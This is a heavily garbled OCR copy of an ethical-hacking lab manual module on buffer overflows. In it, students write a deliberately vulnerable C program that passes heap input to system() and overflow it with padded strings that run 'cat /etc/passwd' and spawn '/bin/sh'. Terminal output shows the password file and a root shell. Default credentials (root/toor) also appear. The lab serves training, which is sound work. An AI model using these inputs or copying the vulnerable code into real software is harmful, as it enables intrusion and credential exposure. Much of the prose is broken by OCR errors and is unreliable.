Beruflich Dokumente
Kultur Dokumente
L ab M a n u a l
B u ffe r
O v e r flo w M o d u le 18
B u f f e r O v e r f lo w
tta c k
In ab u ffe ro v e r f lo w ,w h ilew ritin gda tat oabiffer, t h eb/ffer sb o u n d a r yis o v e r r u nan da d ja c e n tm e m o r yiso v e r w r it t e n .
I CON KEY
V a lu a b le i n t o r m a d o a ________
Lab Scenario
S o u r c e : h t t p : / / w w w . 1c .u 1 1ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w H a c k e r s c o n t in u o u s ly lo o k t o r v u ln e r a b ilit ie s 11 1 s o f tw a r e o r a c o m p u t e r t o b r e a k in t o th e s y s te m b y e x p lo it in g th e s e v u ln e r a b ilit ie s .
Test yo u r k n o w le d g e
sA
W e b e x e rc is e
T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w
m W o r k b o o k r e v ie w
a tta c k , w h e r e
a p ro g ra m
1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t lie s w i t h i n it s v a l i d r a n g e . A
th e p r o g r a m , d e s ig n e d t o
s to ra g e a re a ) a n d m o d if y to u n in te n d e d p la c e s ,
th e v a lu e s o f n e a r b y o r even r e p la c e th e
v a r ia b le s ,
ju m p
p r o g r a m 's in s t m c t i o n s b y a r b it r a r y c o d e .
I f th e b u f fe r o v e r f lo w b y d ir e c d y fe e d in g th e o r d in a r y s y s te m
b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e p o is o n o u s in p u t s tr in g no to th e d a e m o n . I f th e b u g lie s 1 1 1 a n th e a
t o o l o r a p p lic a tio n , w i t h
d ir e c t a c c e s s , th e
h a c k e r a tta c h e s
p o is o n o u s
s tr in g w i d i a d o c u m e n t o r a n
e m a il w h ic h , o n c e
o p e n e d , w i l l la u n c h
p a s s iv e b u f f e r o v e r f lo w
a tta c k . S u c h a tta c k s a re e q u iv a le n t t o
a h a c k e r lo g g in g in t o
th e s y s te m w i d i d ie s a m e u s e r I D
a n d p r iv ile g e s a s d ie c o m p r o m is e d p r o g r a m .
B u ffe r
o v e r f lo w
bugs
a re
e s p e c ia lly
co m m o n
111
p ro g ra m s ,
s in c e
t h a t la n g u a g e m a rk
d o e s n o t p r o v id e s b u i lt - i n
a rra y b o u n d
c h e c k in g , a n d u s e s a f in a l n u l l b y te t o
t h e e n d o t a s t r in g , in s te a d o f k e e p in g it s le n g t h 1 1 1 a s e p a ra te f ie ld . T o
m ake dungs
w o r s e , C p r o v id e s m a n y lib r a r y f u n c t io n s , s u c h as s t r c a t a n d g e t l i n e , w h ic h c o p y s tr in g s w i t h o u t a n y b o u n d s - c h e c k in g . A s an e x p e rt
eth ical h a c k e r
and
p en etration te s te r,
you
m ust
have
sound
k n o w le d g e o f w h e n a n d h o w
b u f fe r o v e r f lo w
o c c u rs . Y o u m u s t u n d e rs ta n d
sta c k s-
b a se d
b u ffe r
and
h eap -b ased
111
b u f f e r o v e r flo w s , p e r f o r m and ta k e
o v e r f lo w s
p ro g ra m s ,
p r e c a u t io n s
b u f fe r o v e r f lo w
a tta c k s .
Lab Objectives
T h e o b je c t iv e o f t i n s la b is t o h e lp s tu d e n ts t o le a r n a n d p e r f o r m b u ffe r o v e r f lo w a tta c k s t o e x e c u te p a s s w o r d s .
1 1 1 t in s la b , y o u
n e e d to : o v e r f lo w b u ffe r
P r e p a re a s c r ip t t o
R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
P e rfo rm
E n u m e ra te
& This lab can be d e m o n stra te d using B ack track Virtual M achine
Lab Environment
A A A c o m p u te r r u n n in g w ith
as H o s t m a c h in e
V i r t u a l M a c h in e r u n n in g w i t h
B ack T rack 5 R3
w e b b ro w s e r w ith In te rn e t access
A d m in is t r a t iv e p r iv ile g e s t o 1 1 1 1 1 t o o ls
Lab Duration
T i m e : 2 0 A J in u t e s
c a s e o f v io la d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e tr ig g e r e d b y in p u t s d ia t a re d e s ig n e d t o e x e c u te c o d e , o r a lte r th e w a y th e p r o g r a m
111
o p e r a te s . T i n s m a y r e s u lt in c o r r e c t o f m any r e s u lt s , a
e r r a tic
p ro g ra m a b re a c h
b e h a v io r , o f s y s te m
in c lu d in g
m e m o ry
access a re
e rro rs , b a s is
c ra s h , o r
s e c u r it y . T h u s ,
t lie v
th e
s o ftw a r e
v u ln e r a b ilit ie s a n d c a n b e m a lic io u s ly e x p lo it e d .
2 * TASK 1
Overview
Lab Tasks
R e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w : E n u m e r a t in g P a s s w o rd s 11 1 D e f a u lt P a s s w o r d L is t o o o o o W r it e a C o d e C o m p ile d ie C o d e E x e c u te th e C o d e P e rfo rm B u ff e r O v e r f lo w A t ta c k
O b t a i n C o m m a n d S h e ll
Lab Analysis
A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e la b e x e r c is e . G i v e y o u r o p i n i o n o n y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .
P L E A S E
T A L K
T O
Y O U R
I N S T R U C T O R T O T H I S
I F
Y O U L A B .
H A V E
Q U E S T I O N S
R E L A T E D
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
B u f f e r O v e r flo w
E x a m
p le
In ab / r f f e ro v e ijlo w ,w h ilew ritingda tat oab / r f f e r ,t h eb u ffe r 'sb o u n d a r yis o v e r r u nan da d ja c e n t m e m o r yiso v e r w r it t e n .
I C O N K E Y
Lab Scenario
111
/ V a lu a b le in f o r m a tio n
c o m p u te r
s e c u r it y
and
p r o g r a m m in g ,
b u ffe r
o v e r f lo w ,
0 1 b u ffe r
o v e rru n ,
y* s
a c h a r a c te r s trin g , th e s iz e o f d ie in p u t
r e c e iv in g and
b u t t e r is r e l a t i v e l y a p p lic a tio n
s m a ll c o m p a r e d check th e
to
th e
p o s s ib le b u ffe r
s tr in g ,
th e
d o e s n 't
s iz e .
T lie
W e b e x e rc is e
a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g fu n c tio n s , s u c h o v e r f lo w in g a s lo c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d th e re tu rn a d d re s s . T lie
W o r k b o o k r e v ie w
s t r in g c a n a lte r s u c h in f o r m a t io n . T in s
a ls o m e a n s t h a t a n a t ta c k e r c a n
c h a n g e th e in f o r m a t io n as h e 0 1 s h e w a n ts to . F o r e x a m p le , th e a tta c k e r c a n in je c t a s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t r i n g d i a t a l s o l e a d s t o th e e x e c u tio n o f
th e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d re s s t o t h e a d d re s s o f th e a t ta c k c o d e . T l ie u l t i m a t e g o a l is u s u a lly t o g e t c o n t r o l o f a p r iv i le g e d s h e ll b y s u c h m e t h o d s .
P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s i n c l u d e C + + , w h ic h p r o v id e
110
and
b u ilt - in
p r o te c tio n
a g a in s t a c c e s s in g 0 1 o v e r w r i t i n g d a ta 1 1 1
p r e v e n t b u f f e r o v e r f lo w s . A s a
y o u s h o u ld b e a b le t o im p le m e n t p r o t e c t io n be a w a re o f a ll d ie d e fe n s iv e a tta c k s
a g a in s t s t a c k fo r b u ffe r
11111-
s m a s lu n g o v e r f lo w t im e
m ust can
m e a s u re s by o f
p re v e n t b u ffe r
o v e r f lo w
im p le m e n tin g fu n c tio n s
111
checks,
o b f u s c a t io n ,
r a n d o m iz in g
lo c a tio n
lib c ,
a n a ly z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s s u c h as J a v a , M L , e tc .
Lab Objectives
T h e o b je c t iv e o f t i n s la b is t o h e lp s tu d e n ts t o le a r n a n d p e r f o r m b u ffe r o v e r f lo w t o e x e c u te p a s s w o r d s . n e e d to :
1 1 1 t in s la b , y o u
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
P r e p a re a s c r ip t t o
o v e r f lo w
b u ffe r
E n u m e ra te
Lab Environment
A A A c o m p u te r r u n n in g w ith
as H o s t m a c h in e
Y i r m a l M a c h in e r u n n in g w i t h w e b b ro w s e r w ith
B ack T rack 5 R3
Internet a c c e s s
Lab Duration
T im e : 2 0 M in u t e s
d a ta
w r itte n to a
W hen die following program is compiled and run, it will assign a block o t memory 1 1 bytes long to hold die attacker string, strcpy function will copy the string D D D D D D D D D D D D D D into an attacker string, w hich will exceed the buffer size o f 11 bytes, resulting 111 buffer overflow.
0123456789 1 0 1112
D D D D D D D D D D D D \ o String
{
char Bufferfll] = AAAAAAAAAA; strcpylBuffer/DDDDDDDDDODD;} printf(96\n. Buffer); return ;
3 4
5 6 7
8 9
10
A A A A A A A A A A
\0
1 2
S7 6
Lab Tasks
S TASK 1
1. 2. Launch your B ack T rack 5 R3 Virtual Machine. For btlogui, type root and press Enter. Type the password as toor, and press E nter to log 111 to BackTrack virtual machine. W rite a Code
Ethical Hacking and Countenneasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
R * T
@3
1 h
1 .0 9 1 5 3 1 1 in p u t: A TT ra n sla ted Set 2 k e y b o a rd a s /d c1 ;icc s^ p la tfo r1 v 'i8 l> 1 2 /'s crio 0 /in p u t/'in p u tl
1.0952761 Registering the dns resolver key type 1.0957031 registered ta sk stats version 1 1.1639921 Magic nunber: 12:12U:12G 1.1644561 acpi device:01: hash notches 1.105658) rtc.cn os 00:02: settin g syste* clock to 2012-09-25 11:06:59 UTC(1340571219) 1.165468) BIOS E D O f a c il it y v0.16 2004-Jun-25, 0 devices found 1.1658621 C O D information not availab le. 1.2378181 a ta l.0 6 : ATA-8: Uirtual HD, 1 .1 .0 , raax M U D M A 2 1.2389361 a ta l.0 6 : 33554432 scctors, nu lti 12B: LBA48 1.2415511 ata2.06: AIAPI: Uirtual CD, , waxhUDt1A 2 1.2432671 ata2.06: configured for M U D I1n2 1.2441181 a ta l.0 6 : configured for flU D H flZ 1.244223) s c s i 0:0:0:6: Direct-Access A TA Uirtual H O 1 .1 . PQ: 6 AMSI: 5 1.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0 GiB) 1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks 1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff 1.2463841 sd 0:0:0:0: Attached sc si generic sgO type 0 1.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support D PT nr FIX 1.2404231 sc s i 1:0:0 0: CD R O M Hsft Uirtual CD/RO M 1.0 PQ: 6 ANSI 5 1.2515061 sr6: sc si3 nnc drive: 0x/0 k tray 1.2526091 cdron: Uniform C DH U M driver Revision: 3.26 1.2527931 sr 1:0:0:0: Attached sc si generic sg l type 5 1.25U657) sda: sdal r,da2 < xda5 > 1.2506591 *d 0:0:0:0: Inda I Att<1chd 8C5I disk 1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd 1.2608041 Urite protectI 1 M | the karnal read only data: 1228Hk 1.26S6241 Freeing unused kernel Mwinj: 1732k freed 1.2699051 Freeing unused kernel e 1 *nr1 j: 1492k freed ling, please w a it. . . 1.2873151 udcv: starting version 151 1.2962U0I udevd (03): /prot/U3/oun adj is deprecated, please use /p roc/tlJ/w n score adj instead. 1.3963921 Floppy driv e (s): fdO is 1.44f1 1.41 HH4 I FD C 6 is an 02070. 2.02030?) Refined T8C clocksource calibration: 3692.970 fti . .
F IG U R E 1.1: BackTrack Log in __ B u ffer overflow occurs when a program or process tries to store m ore data in a buffer.
BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection Re
3.
T ype
s ta rtx
t o la u n c h d ie G U I .
1-1*
I't > (- 3 1 11 h
1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff 1.246384) sd 0:0:6:6: Attached sc si generic sy6 type 6 1.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU1 1.2404231 sc si 1:6:6:0: C DR O M Msft Uirtual C D-RO M 1 0 PQ: 6 AMSI: 5 l.25150bl sr6: sc si3 rwc drive: 0x/0x tray 1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.20 1.2527931 sr !:0:6:6: Attached sc si generic sy l type 5 I .2586571 sda: sdal sda2 < sda5 > 1.2506591 sd 0:0:6 6: (sdal Attaclied SCSI disk 1.2602631 Freeing unused kernel ncmury: 'J6Uk freed 1 .2608041 N rite protecting the kernel read-only data: 122IM Ik 1.265624) Frrelny umis.d kern I fiiMitry: 1732k freed 1.269985) Freeing unused kernI nonary: 1492k freed ading, please u a i t ... 1.2873151 udev: starting version 151 1.29620BI udevd (83): /prc!c/H3/ 0jr_<1dj is deprei^ted, please use /proc/G3o1*_score_adj instead. 1.3963921 Floppy driv e (s): fd6 is 1.440 1.4133841 FK 6 la an H2678. 2.0203071 R.rfl1 d TSC clocksource calibration: 3692 .970 MHz. cklrack 5 IQ - 64 Bit bt t ty l y la tined out a fter 60 seconds.
System information as of Iuc Sep 25 16:45:47 1ST 2012 Systea load: Usage o f : Oenortj usage: Swap usage: 0.08 72.3* o f 15.23GB 35 O k Processes: 72 Users logged In: 0 IP address for eth6: 10.0.0.14
B ackT rack 5 R3
G U I d e s k to p o p e n s , as s h o w n in d ie f o llo w in g s c r e e n s h o t.
in kedit is case-sensitive.
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
m e n u , a n d t h e n s e le c t
A cc esso rie s
* v
^ BackTtock
4& #***%
internet | TWmlrwl Tkrminator
flPlom ce
)14 other
WKSound 6 V^deo
0 System Tools
ca
<< b a c k tra c k
6.
E n t e r d ie f o llo w in g c o d e 11 1 g e d it T e x t E d it o r s e n s itiv e ) .
(Note:
t h e c o d e is c a s e -
# i n c l u d e < s t d i o . h> v o i d m a i n ()
{
c h a r *name; c h a r *command; n ame =( ch ar * ) m a l l o c ( 10) ; command=(char * ) m a l l o c (128) ; p r i n t f ( " a d d r e s s o f name i s : %d\n", name) ; p r i n t f ( " a d d r e s s o f command i s : %d\n",command); p r i n t f ( " D i f f e r e n c e be twe en a d d r e s s i s : %d\ n", commandC E H Lab Manual Page 907
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
}
> v x *u n s a v e d Docum ent 1 g e d it File Edit View Search Tools Documents Help ^^^Jo p e n Ii=y1 Code is compiled using the follow ing commend: gee n *Unsaved Document 1 X
# 1 nclude<std 1 0 .h> vo id m ain () char name; char command; name=(char * )m a llo c (1 0 ); command=(char * )m a llo c (1 2 8 ); p r in t f ( " a d d r e s s o f name i s : %d\n",nam e); p r in t f ( " a d d r e s s o f command is:%d\n",com m and); p r i n t f ( D iffe r e n c e between address i s :%d\n ,command-name); p r i n t f ( " E n t e r your name: ) ; g e ts(n am e); p r i n t f C H e llo %s\n",nam e); system ( command) ;
^_Save
Undo
^ 9k
buffer.c biiffer.
Plain Text
Tab Width: 8
Ln 15, Col 2
o r s im p ly c lic k
S ave
N o to o l can solve completely die problem o f buffer overflow , but die) surely can decrease the probability o f stack smashing attacks.
N o w
la u n c h d ie c o m m a n d t e r m in a l a n d c o m p ile d ie
co d e
by
running:
Compile th e Code
gcc b u f f e r . c -o b u f f e r
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
/v
root@bt: -
File Edit View Terminal Help root@ bt: # |gcc b u ffe r.c -0 b u ffe rfj
.!buffer
ignore
th e m .
File Edit View Terminal Help ro o tg b t:-# gcc b u ffe r .c 0 b u ffe r b u ffe r .c : In fu n c tio n 'm a in ': b u f fe r . c : 6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n mal
loc1 ^
b u f fe r . c : 8 : w arning: form at '%d' expects type 1 " n t ' , but a rg u m e n t^'tts s type 'ch ar b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch ar ' g b u f f e r . c : 1 0 : w arning: form at '%d' expects type ' i n t , but a rg um ent# has type ' I ong i n t ' /tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ': b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t be used. root@bt:~# [ ]
: b a c k I tra c k
F IG U R E 1.8: BackTrack E rro r Message W in d o w
j
E x ecu te th e Code
1 0 . T o e x e c u te th e p r o g r a m
ty p e .
/buffer
Ethical Hacking and Countemieasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
ro o t@ b t: ~
File Edit View Terminal Help r o o tg b t: # | . /b u f fe r | address o f name is : 20144144 address o f command i s :20144176 D iffe re n c e between address is :32 E nter your name:|
A n executable program
back
Input
t r a c k ^ )1
Enter; Jaso n
exam ple.
- :v x ro o t@ b t
File Edit View Terminal Help root@bt:~# address o f address o f D iffe re n c e Enter your . /b u f f e r name is : 20144144 command i s : 26144176 between address is : 32 name:| as |
ca
B u ffer overflows w o rk
b a ck I tra c k
F IG U R E 1.10: In p u t Field
12. Hello J a s o n
s h o u ld b e p r in t e d .
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
/\
- :v
ro o t@ b t
ootbt:~# fl
b a c k I tra c k
F IG U R E 1.11: H ello Jason 1 3 . N o w , o v e r f lo w t h e b u f f e r a n d e x e c u te t h e lis te d s y s te m c o m m a n d s . 14. R u n d ie p r o g r a m a g a in b y t y p i n g
T A S K
./buffer.
15. T y p e
12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e
h e ld .
Input
1 6 . Y o u c a n v ie w a p r i n t o u t o f d i e p a s s w o r d h ie .
a
ro o t@ b t: -
File Edit View Terminal Help Buffer overflow vulnerbililties typically occur in code that a programmer cannot accratelv predict buffer overflow behvior.
root@ bt:~# ./ b u ffe r address o f name i s : 17747984 address o f command i s :17748016 D iffe re n c e between address i s :32 E n te r your name:|12345678912345678912345678912345cat /etc/passwd| H e llo 12345678912345678912345678912345cat /etc/passwd r o o t: x : e : 0 : r o o t: / r o o t: /bin/bash daemon: x : 1 : 1 : daemon: /us r / s b in : /bin/sh bin:x :2 :2 :bin:/bin:/bin/sh sys : x : 3 : 3 : sys : /d e v : /bin/sh
sync: x : 4 :65534:sync: / b i n : /b in /s y n c
games: x : 5 : 60: games: /us r/games: /bin/sh
F IG U R E 1.12: Executing Password 1 7 . N o w , o b t a i n a C o m m a n d S h e ll. 18. R u n d ie p r o g r a m a g a i n ./buffer a n d t y p e 12345678912345678912345678912345/ b i n / s h 111 the Input field.
m.
T A S K
Ethical Hacking and Countenneasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
/ v
x root@ bt: -
File Edit View Terminal Help root@bt:~# . / b u f f e r address o f name is : 24616976 address o f command i s :24617008 D iffe re n c e between address is :32 E nter your nameJ12345678912345678912345678912345/bm/sh| H e llo 12345678912345678912345678912345/bin/sh s h-4.1# s h-4.1# sh-4.1# [ ]
back
Exit 1 1 1
tra c k
Lab Analysis
A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e la b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1 y o u r t a r g e t s s e c u r it y p o s t u r e a n d e x p o s u r e .
T o o l/U tility
I n f o r m
a tio n
C o lle c te d /O b je c tiv e s
A c h ie v e d
A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6 A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8 D iffe r e n c e b e t w e e n a d d r e s s is : 3 2
E n te r y o u r n a m e : 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in / s h
B u ffe r O v e rflo w
H e llo 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in /s h
s h -4 .1 # s h -4 .1 # s h -4 .1 #
P L E A S E
T A L K
T O
Y O U R
I N S T R U C T O R T O T H I S
I F
Y O U L A B .
H A V E
Q U E S T I O N S
R E L A T E D
Questions
1. 2. 3. E v a lu a t e v a r io u s m e th o d s t o A n a ly z e h o w to p r e v e n t b u f f e r o v e r f lo w . b u f f e r o v e r f lo w . e rro rs u n d e r d e te c t r u n - tim e
E v a lu a t e a n d lis t th e c o m m o n c a u s e s o f b u f f e r - o v e r f lo w .N E T la n g u a g e .
I n te r n e t
C o n n e c tio n
R e q u ir e d
Y e s
0 N
P la tf o r m
S u p p o r te d
C la s s r o o m
!L a b s
Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.